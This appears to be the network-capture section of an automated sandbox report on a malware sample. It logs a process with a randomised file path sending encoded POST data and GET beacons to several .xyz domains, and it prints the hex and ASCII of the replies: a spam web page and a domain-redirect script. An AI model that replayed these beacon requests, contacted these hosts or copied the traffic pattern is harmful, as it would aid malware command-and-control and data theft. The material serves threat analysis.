                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                Server: cloudflare
                                                                CF-RAY: 8ef35f83bbe57d14-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2003&min_rtt=2003&rtt_var=1001&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=541&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 32
                                                                Data Ascii: error code: 522


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                25 | 192.168.2.12 | 49755 | 103.249.106.91 | 80 | 1344 | C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Dec 9, 2024 08:45:44.474548101 CET | 787 | OUT | POST /dnjw/ HTTP/1.1
                                                                Host: www.6822662.xyz
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate
                                                                Connection: close
                                                                Content-Length: 202
                                                                Cache-Control: max-age=0
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Origin: http://www.6822662.xyz
                                                                Referer: http://www.6822662.xyz/dnjw/
                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                Data Raw: 45 62 66 78 36 3d 47 4a 47 36 69 56 36 6f 4e 74 77 78 54 66 62 68 53 74 34 78 6f 48 58 76 42 35 4a 6c 41 4b 2b 74 2f 6b 75 4b 66 43 41 6f 4a 59 46 4f 30 38 6e 72 51 46 50 31 59 46 4c 55 45 56 50 55 77 66 30 68 78 36 32 55 76 37 33 6c 53 53 44 48 30 57 47 6a 32 77 4e 6a 6c 74 46 70 47 51 6e 31 57 33 42 50 74 42 69 6a 4a 4d 39 64 74 67 59 73 43 44 31 72 4b 6f 76 51 78 6b 79 4a 76 32 54 6e 68 38 4b 32 69 32 68 6a 4c 38 50 76 32 31 61 4f 45 64 36 4b 74 57 6b 74 54 54 32 61 72 6e 68 4a 65 37 54 34 63 2b 6c 77 61 69 65 6c 79 6f 49 75 75 6b 66 6c 66 4e 74 30 42 62 37 4c 6f 77 4d 6d 73 2f 2f 73 50 41 3d 3d
                                                                Data Ascii: Ebfx6=GJG6iV6oNtwxTfbhSt4xoHXvB5JlAK+t/kuKfCAoJYFO08nrQFP1YFLUEVPUwf0hx62Uv73lSSDH0WGj2wNjltFpGQn1W3BPtBijJM9dtgYsCD1rKovQxkyJv2Tnh8K2i2hjL8Pv21aOEd6KtWktTT2arnhJe7T4c+lwaielyoIuukflfNt0Bb7LowMms//sPA==
                                                                Dec 9, 2024 08:45:45.994277954 CET  190    IN         HTTP/1.1 400 Bad Request
                                                                Server: nginx
                                                                Date: Mon, 09 Dec 2024 07:45:45 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: d404 Not Found0


                                                                Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                                                26          192.168.2.12  49756        103.249.106.91  80                1344  C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe
                                                                Timestamp                           Bytes  Direction  Data
                                                                Dec 9, 2024 08:45:47.198342085 CET  807    OUT        POST /dnjw/ HTTP/1.1
                                                                Host: www.6822662.xyz
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate
                                                                Connection: close
                                                                Content-Length: 222
                                                                Cache-Control: max-age=0
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Origin: http://www.6822662.xyz
                                                                Referer: http://www.6822662.xyz/dnjw/
                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                Data Raw: 45 62 66 78 36 3d 47 4a 47 36 69 56 36 6f 4e 74 77 78 52 2f 4c 68 51 50 51 78 35 33 58 73 66 70 4a 6c 4f 71 2f 6b 2f 6b 71 4b 66 44 30 43 49 74 74 4f 78 70 44 72 54 45 50 31 66 46 4c 55 51 46 50 56 6f 2f 31 74 78 36 79 32 76 35 6a 6c 53 53 58 48 30 58 32 6a 32 44 31 69 6c 39 46 72 66 41 6e 7a 63 58 42 50 74 42 69 6a 4a 4d 34 34 74 67 41 73 43 53 6c 72 59 39 44 58 38 45 79 4b 34 47 54 6e 6c 38 4c 65 69 32 68 4e 4c 34 48 42 32 32 69 4f 45 59 47 4b 6f 58 6b 75 59 54 32 63 76 6e 67 4d 4f 61 79 63 56 4e 42 75 45 55 4f 69 7a 4a 35 4c 72 69 53 2f 41 2f 6c 69 55 59 76 47 6c 6e 31 57 68 38 43 6c 55 43 42 6d 52 34 35 51 66 43 73 55 31 66 4a 6e 39 4d 4e 4e 34 34 6b 3d
                                                                Data Ascii: Ebfx6=GJG6iV6oNtwxR/LhQPQx53XsfpJlOq/k/kqKfD0CIttOxpDrTEP1fFLUQFPVo/1tx6y2v5jlSSXH0X2j2D1il9FrfAnzcXBPtBijJM44tgAsCSlrY9DX8EyK4GTnl8Lei2hNL4HB22iOEYGKoXkuYT2cvngMOaycVNBuEUOizJ5LriS/A/liUYvGln1Wh8ClUCBmR45QfCsU1fJn9MNN44k=
                                                                Dec 9, 2024 08:45:48.709275007 CET  190    IN         HTTP/1.1 400 Bad Request
                                                                Server: nginx
                                                                Date: Mon, 09 Dec 2024 07:45:48 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: d404 Not Found0


                                                                Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                                                27          192.168.2.12  49757        103.249.106.91  80                1344  C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe
                                                                Timestamp                           Bytes  Direction  Data
                                                                Dec 9, 2024 08:45:49.985852003 CET  1820   OUT        POST /dnjw/ HTTP/1.1
                                                                Host: www.6822662.xyz
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate
                                                                Connection: close
                                                                Content-Length: 1234
                                                                Cache-Control: max-age=0
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Origin: http://www.6822662.xyz
                                                                Referer: http://www.6822662.xyz/dnjw/
                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                Data Raw: 45 62 66 78 36 3d 47 4a 47 36 69 56 36 6f 4e 74 77 78 52 2f 4c 68 51 50 51 78 35 33 58 73 66 70 4a 6c 4f 71 2f 6b 2f 6b 71 4b 66 44 30 43 49 72 31 4f 74 50 50 72 56 58 58 31 65 46 4c 55 4d 31 50 51 6f 2f 31 67 78 36 4b 79 76 35 2f 66 53 52 76 48 32 31 2b 6a 2b 53 31 69 38 4e 46 72 43 51 6e 32 57 33 42 61 74 43 61 6e 4a 4d 49 34 74 67 41 73 43 52 74 72 62 6f 76 58 2b 45 79 4a 76 32 54 6a 68 38 4c 6c 69 32 35 37 4c 34 4b 30 33 48 43 4f 42 49 32 4b 71 42 49 75 62 7a 32 65 71 6e 67 71 4f 61 2b 44 56 4e 74 69 45 55 53 45 7a 4a 42 4c 6e 6a 7a 54 65 76 59 38 42 70 4c 61 75 58 74 76 75 66 66 6e 56 53 78 46 63 62 68 55 51 68 51 7a 35 75 38 2b 6a 5a 45 4b 68 2f 51 57 34 61 2f 6f 38 4c 73 41 69 2b 50 2b 76 48 54 30 61 2b 70 5a 64 6c 6c 61 44 56 55 56 72 42 73 54 2b 7a 77 64 59 44 76 74 56 54 76 48 6d 71 38 4d 64 44 47 57 6b 2f 32 76 75 58 34 39 78 62 70 46 55 50 7a 67 43 6f 75 64 2b 69 67 74 71 6e 69 48 77 6d 66 72 34 47 75 42 7a 72 72 70 72 42 76 42 48 53 46 33 79 46 49 51 34 72 39 6c 62 59 35 69 56 35 4f 48 [TRUNCATED]
                                                                Data Ascii: Ebfx6=[TRUNCATED]
                                                                Dec 9, 2024 08:45:51.466078997 CET  190    IN         HTTP/1.1 400 Bad Request
                                                                Server: nginx
                                                                Date: Mon, 09 Dec 2024 07:45:51 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: d404 Not Found0


                                                                Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                                                28          192.168.2.12  49758        103.249.106.91  80                1344  C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe
                                                                Timestamp                           Bytes  Direction  Data
                                                                Dec 9, 2024 08:45:52.758831978 CET  531    OUT        GET /dnjw/?Ebfx6=LLuahgeFNd50MfmeR+YO4X7oQIpbAv675x2tVSlUIoVemPDFIi7IcWvJHwj84u5Zt+Ov/a/NakHy5HK7jRYViNkqfBLCVUFvihPDLt9byicPXxQNcd7bh2g=&Njld=LDTtwxbX2vi0G HTTP/1.1
                                                                Host: www.6822662.xyz
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Connection: close
                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                Dec 9, 2024 08:45:54.299120903 CET  1236   IN         HTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Mon, 09 Dec 2024 07:45:54 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Vary: Accept-Encoding
                                                                Data Raw: 62 37 65 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6d 69 70 3d 22 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 69 63 61 62 6c 65 2d 64 65 76 69 63 65 22 20 63 6f 6e 74 65 6e 74 3d 22 70 63 2c 6d 6f 62 69 6c 65 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 4d 6f 62 69 6c 65 4f 70 74 69 6d 69 7a 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 48 61 6e 64 68 65 6c 64 46 72 69 65 6e 64 6c 79 22 20 63 6f 6e 74 65 6e 74 3d 22 74 72 75 65 22 20 2f 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 [TRUNCATED]
                                                                Data Ascii: b7e3<!DOCTYPE html><html mip=""><head><meta charset="utf-8" /><meta name="applicable-device" content="pc,mobile" /><meta name="MobileOptimized" content="width" /><meta name="HandheldFriendly" content="true" /><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=0" /><link rel="shortcut icon" href="//www.6822662.xyz/favicon.ico" type="image/x-icon" /><title>&#20061;&#37325;&#29615;&#22856;-&#29992;&#25163;&#26426;&#24590;&#20040;&#30475;&#23707;&#22269;&#22823;&#29255;</title><meta name="keywords" content="&#20061;&#37325;&#29615;&#22856;" /><meta name="description" content="&#20061;&#37325;&#29615;&#22856;" /><link rel="stylesheet" type="text/css" href="https://c.mipcdn.com/static/v1/mip.css" /><link rel="stylesheet" type="text/css" href="http://www.6822662.xyz/template/news/mip05/css/style.css" /><link rel="stylesheet" href="http://www.6822662.xyz/template/news/mip05/css/fontawesome-all.min.css" /><style mip-cus [TRUNCATED]
                                                                Dec 9, 2024 08:45:54.299150944 CET  1236   IN         Data Raw: 7d 20 2e 6d 31 35 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 35 70 78 3b 7d 20 2e 68 65 61 66 65 72 79 73 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 33 33 33 33 33 33 3b 20 7d 20 2e 6e 61 76 20 6c 69 3a 68 6f 76 65 72
                                                                Data Ascii: } .m15{margin-bottom:15px;} .heaferys { background-color: #333333; } .nav li:hover>a { background-color: #838c92; } .nav li.active>a { background-color: #838c92; } .nav ul ul { background-color: #838c92; } .nav ul li:hover>ul { background-colo
                                                                Dec 9, 2024 08:45:54.299164057 CET  1236   IN         Data Raw: 3b 20 7d 20 2e 6c 69 73 74 32 20 6c 69 2e 70 61 67 65 2d 69 74 65 6d 20 61 2c 2e 6c 69 73 74 20 6c 69 2e 70 61 67 65 2d 69 74 65 6d 20 61 7b 20 77 69 64 74 68 3a 20 35 32 70 78 3b 20 7d 20 2e 6c 69 73 74 20 6c 69 2e 70 61 67 65 2d 69 74 65 6d 7b
                                                                Data Ascii: ; } .list2 li.page-item a,.list li.page-item a{ width: 52px; } .list li.page-item{ display: inline-block; } .pagebar div.page-control{ margin:0 auto; text-align: center; }@media only screen and (max-width: 1180px){ .m_menu{top:0;bottom:0;right
                                                                Dec 9, 2024 08:45:54.299482107 CET  672    IN         Data Raw: 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 39 39 39 3b 74 6f 70 3a 32 30 70 78 3b 6c 65 66 74 3a 31 32 70 78 7d 20 2e 6d 5f 6d 65 6e 75 20 75 6c 2e 6d 65 6e 75 20 6c 69 20 73 70 61 6e 2e 6d 65 6e 75 5f 62 74 6e 3a 61 66 74 65 72 7b 74 72 61 6e 73
                                                                Data Ascii: ground-color:#999;top:20px;left:12px} .m_menu ul.menu li span.menu_btn:after{transform:rotate(90deg);-ms-transform:rotate(90deg);-moz-transform:rotate(90deg);-webkit-transform:rotate(90deg);-o-transform:rotate(90deg)} .m_menu ul.menu li span.m
                                                                Dec 9, 2024 08:45:54.299664974 CET  1236   IN         Data Raw: 6e 74 3e 61 2c 2e 6d 5f 6d 65 6e 75 20 75 6c 2e 6d 65 6e 75 20 6c 69 2e 63 75 72 72 65 6e 74 2d 6d 65 6e 75 2d 69 74 65 6d 3e 61 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 20 2e 6d 5f 6d 65 6e 75 20 75 6c 2e 6d 65 6e 75 20 6c 69 3a 68 6f 76 65 72 7b 62
                                                                Data Ascii: nt>a,.m_menu ul.menu li.current-menu-item>a{color:#fff} .m_menu ul.menu li:hover{background-color:rgba(0,0,0,0.2)} .m_menu ul.menu li:hover>a{color:#fff} .m_menu ul.menu li:hover>span.menu_btn:before,.m_menu ul.menu li:hover>span.menu_btn:afte
                                                                Dec 9, 2024 08:45:54.299675941 CET  1236   IN         Data Raw: 22 63 65 62 36 65 36 22 3e 3c 2f 73 75 70 3e 3c 74 69 6d 65 20 64 72 6f 70 7a 6f 6e 65 3d 22 36 61 35 64 30 30 22 3e 3c 2f 74 69 6d 65 3e 3c 64 69 76 20 64 72 6f 70 7a 6f 6e 65 3d 22 64 64 36 33 62 64 22 20 69 64 3d 22 6d 6f 6e 61 76 62 65 72 22
                                                                Data Ascii: "ceb6e6"></sup><time dropzone="6a5d00"></time><div dropzone="dd63bd" id="monavber" class="edd63b nav heaferys" data-type="index" data-infoid=""><tt date-time="f918f3"></tt><var dir="b109f4"></var><area lang="f82d7a"></area><ul class="fbb3a4 na
                                                                Dec 9, 2024 08:45:54.299686909 CET  1236   IN         Data Raw: 72 79 2d 32 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 36 38 32 32 36 36 32 2e 78 79 7a 2f 74 61 6f 6e 61 69 6d 75 78 69 61 6e 67 6e 61 69 2f 22 20 64 61 74 61 2d 74 79 70 65 3d 22 6d 69 70 22 20 64 61 74 61 2d 74 69 74 6c
                                                                Data Ascii: ry-2"><a href="http://www.6822662.xyz/taonaimuxiangnai/" data-type="mip" data-title="" title=""></a></li><li id="navbar-category-2"><a href="http://www.6822662.xyz/xiaotianyou/" data-type="mip" data
                                                                Dec 9, 2024 08:45:54.300338984 CET  1236   IN         Data Raw: 67 32 32 22 3e 3c 62 64 6f 20 64 61 74 65 2d 74 69 6d 65 3d 22 32 32 39 39 32 35 22 3e 3c 2f 62 64 6f 3e 3c 64 66 6e 20 64 69 72 3d 22 63 33 63 31 37 35 22 3e 3c 2f 64 66 6e 3e 3c 66 6f 6e 74 20 6c 61 6e 67 3d 22 31 34 63 39 66 38 22 3e 3c 2f 66
                                                                Data Ascii: g22"><bdo date-time="229925"></bdo><dfn dir="c3c175"></dfn><font lang="14c9f8"></font><div dropzone="fe3bee" id="pt" class="n8a3bb bm cl"><ins draggable="43131b"></ins><small dropzone="65382a"></small><sup date-time="988116"></sup><div date-ti
                                                                Dec 9, 2024 08:45:54.300350904 CET  1236   IN         Data Raw: 3c 68 31 3e e4 b9 9d e9 87 8d e7 8e af e5 a5 88 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 75 6c 3e 3c 6c 69 3e 3c 6d 61 70 20 64 69 72 3d 22 61 63 66 33 38 31 22 3e 3c 2f 6d 61 70 3e 3c 62 64 6f 20 6c 61 6e 67 3d 22 38 65 37 63 64 63 22 3e 3c 2f 62 64
                                                                Data Ascii: <h1></h1></div><ul><li><map dir="acf381"></map><bdo lang="8e7cdc"></bdo><dfn draggable="4f4a47"></dfn><div dir="1d08f0" class="u7ae15 img"><a href="http://www.6822662.xyz/Dating/149c599845.html" class="v7f84a item-link" data-type="
                                                                Dec 9, 2024 08:45:54.300363064 CET  1236   IN         Data Raw: 5f 62 6c 61 6e 6b 22 3e 3c 69 20 63 6c 61 73 73 3d 22 79 32 66 61 63 65 20 66 61 20 66 61 2d 63 6f 6c 75 6d 6e 73 22 3e 3c 2f 69 3e e4 b9 9d e9 87 8d e7 8e af e5 a5 88 3c 2f 61 3e 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 3e 3c 69 20 63 6c 61 73 73 3d
                                                                Data Ascii: _blank"><i class="y2face fa fa-columns"></i></a></span><span><i class="zdbed7 fa fa-clock-o"></i>2024-12-09 15:38</span><span><i class="afd490 fa fa-eye"></i>2878</span><span><i class="b8b366 fa fa-tags"></i></span></div></div></li
                                                                Dec 9, 2024 08:45:54.418662071 CET  1236   IN         Data Raw: e4 b8 80 e4 ba 9b e9 99 90 e5 88 b6 e3 80 82 e4 b8 89 e7 ba a7 e7 89 87 e7 9a 84 e5 88 b6 e4 bd 9c e5 92 8c e5 8f 91 e8 a1 8c e5 9c a8 e5 9b bd e9 99 85 e4 b8 8a e5 85 b6 e5 ae 9e 0d 2e 2e 2e 3c 2f 70 3e 3c 69 6e 73 20 64 69 72 3d 22 30 30 65 65
                                                                Data Ascii: ...</p><ins dir="00eef4"></ins><small lang="289dbb"></small><sup draggable="65c895"></sup><div dir="7f84a2" class="f398aa info"><span><a href="http://www.6822662.xyz/dnjw/" target="_


                                                                Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                                                29          192.168.2.12  49760        121.43.155.35   80                1344  C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe
                                                                Timestamp                           Bytes  Direction  Data
                                                                Dec 9, 2024 08:46:00.463568926 CET  805    OUT        POST /404o/ HTTP/1.1
                                                                Host: www.lingdianyun29.xyz
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate
                                                                Connection: close
                                                                Content-Length: 202
                                                                Cache-Control: max-age=0
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Origin: http://www.lingdianyun29.xyz
                                                                Referer: http://www.lingdianyun29.xyz/404o/
                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                Data Raw: 45 62 66 78 36 3d 62 49 70 77 75 6a 78 48 31 6d 51 78 56 59 58 65 6a 49 35 69 64 78 78 65 65 74 70 61 57 4f 4e 53 6f 6b 49 67 62 43 39 38 43 35 78 51 63 33 47 46 31 6c 51 33 54 62 75 77 6e 4b 5a 55 34 2b 70 72 6d 42 41 39 58 30 48 41 56 6e 78 57 42 6f 78 7a 41 47 70 51 7a 4d 75 6c 39 35 53 35 62 64 52 54 45 33 44 7a 71 6b 6c 4a 77 70 38 49 36 57 30 4c 77 34 7a 41 73 56 42 46 32 46 35 53 31 37 78 53 4b 45 53 45 58 41 4d 36 30 2f 70 36 47 6b 76 51 6e 61 55 72 50 6e 45 36 46 68 48 2b 78 4a 72 30 33 56 46 42 36 50 76 73 33 79 48 64 6a 7a 55 4a 78 56 4c 69 46 35 30 6a 31 38 46 32 30 4e 6f 4e 54 67 3d 3d
                                                                Data Ascii: Ebfx6=bIpwujxH1mQxVYXejI5idxxeetpaWONSokIgbC98C5xQc3GF1lQ3TbuwnKZU4+prmBA9X0HAVnxWBoxzAGpQzMul95S5bdRTE3DzqklJwp8I6W0Lw4zAsVBF2F5S17xSKESEXAM60/p6GkvQnaUrPnE6FhH+xJr03VFB6Pvs3yHdjzUJxVLiF50j18F20NoNTg==
                                                                Dec 9, 2024 08:46:01.778703928 CET  1236   IN         HTTP/1.1 200 OK
                                                                Content-Type: text/html
                                                                Content-Length: 14605
                                                                Connection: close
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 09 76 61 72 20 6d 61 70 70 69 6e 67 73 20 3d 20 6e 65 77 20 4d 61 70 28 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 77 77 77 2e 30 64 69 61 6e 79 75 6e 38 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 30 30 30 30 30 63 6c 6f 75 64 2e 74 6f 70 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 6c 69 6e 67 64 69 61 6e 79 75 6e 30 37 2e 74 6f 70 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 6c 69 6e 67 64 69 61 6e 79 75 6e 34 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE html><html><head><script type="text/javascript">var mappings = new Map();mappings.set("www.0dianyun8.xyz", "https://0dyos.com");mappings.set("00000cloud.top", "https://0dyos.com");mappings.set("lingdianyun07.top", "https://0dyos.com");mappings.set("lingdianyun4.xyz", "https://0dyos.com");mappings.set("www.00000cloud.top", "https://0dyos.com");mappings.set("lingdianyun15.top", "https://0dyos.com");mappings.set("lingdianyun26.xyz", "https://0dyos.com");mappings.set("www.0dianyun17.xyz", "https://0dyos.com");mappings.set("www.0cloud2.top", "https://0dyos.com");mappings.set("www.lingdianyun19.top", "https://0dyos.com");mappings.set("lingdianyun39.top", "https://0dyos.com");mappings.set("lingdianyun16.xyz", "https://0dyos.com");mappings.set("www.0dianyun13.xyz", "https://0dyos.com");mappings.set("www.00dianyun3.xyz", "https://0dyos.com");mappings.set("lingdianyun25.xyz", "https://0dyos.com");mappings.set("www.lingdianyu [TRUNCATED]
                                                                Dec 9, 2024 08:46:01.778743982 CET  224    IN         Data Raw: 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 77 77 77 2e 6c 69 6e 67 64 69 61 6e 79 75 6e 33 31 2e 74 6f 70 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09
                                                                Data Ascii: ://0dyos.com");mappings.set("www.lingdianyun31.top", "https://0dyos.com");mappings.set("0dianyun3.xyz", "https://0dyos.com");mappings.set("0dy01.top", "https://0dyos.com");mappings.set("www.0dianyun3.xyz", "h
                                                                Dec 9, 2024 08:46:01.779495955 CET  1236   IN         Data Raw: 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 30 64 69 61 6e 79 75 6e 31 30 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70
                                                                Data Ascii: ttps://0dyos.com");mappings.set("0dianyun10.xyz", "https://0dyos.com");mappings.set("0dianyun18.xyz", "https://0dyos.com");mappings.set("00dianyun2.xyz", "https://0dyos.com");mappings.set("0dianyun1.xyz", "https://0dyos.com");
                                                                Dec 9, 2024 08:46:01.779547930 CET  224    IN         Data Raw: 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 77 77 77 2e 30 64 69 61 6e 79 75 6e 31 38 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a
                                                                Data Ascii: "https://0dyos.com");mappings.set("www.0dianyun18.xyz", "https://0dyos.com");mappings.set("www.lingdianyun4.top", "https://0dyos.com");mappings.set("www.0dy123.xyz", "https://0dyos.com");mappings.set("www.0dy
                                                                Dec 9, 2024 08:46:01.780045033 CET  1236   IN         Data Raw: 76 73 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 77 77 77 2e 6c 69 6e 67 64 69 61 6e 79 75 6e 33 31 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30
                                                                Data Ascii: vs.xyz", "https://0dyos.com");mappings.set("www.lingdianyun31.xyz", "https://0dyos.com");mappings.set("lingdianyun18.top", "https://0dyos.com");mappings.set("lingdianyun21.xyz", "https://0dyos.com");mappings.set("www.lingdianyu
                                                                Dec 9, 2024 08:46:01.780138969 CET  224    IN         Data Raw: 61 6e 79 75 6e 38 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 30 30 64 69 61 6e 79 75 6e 34 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f
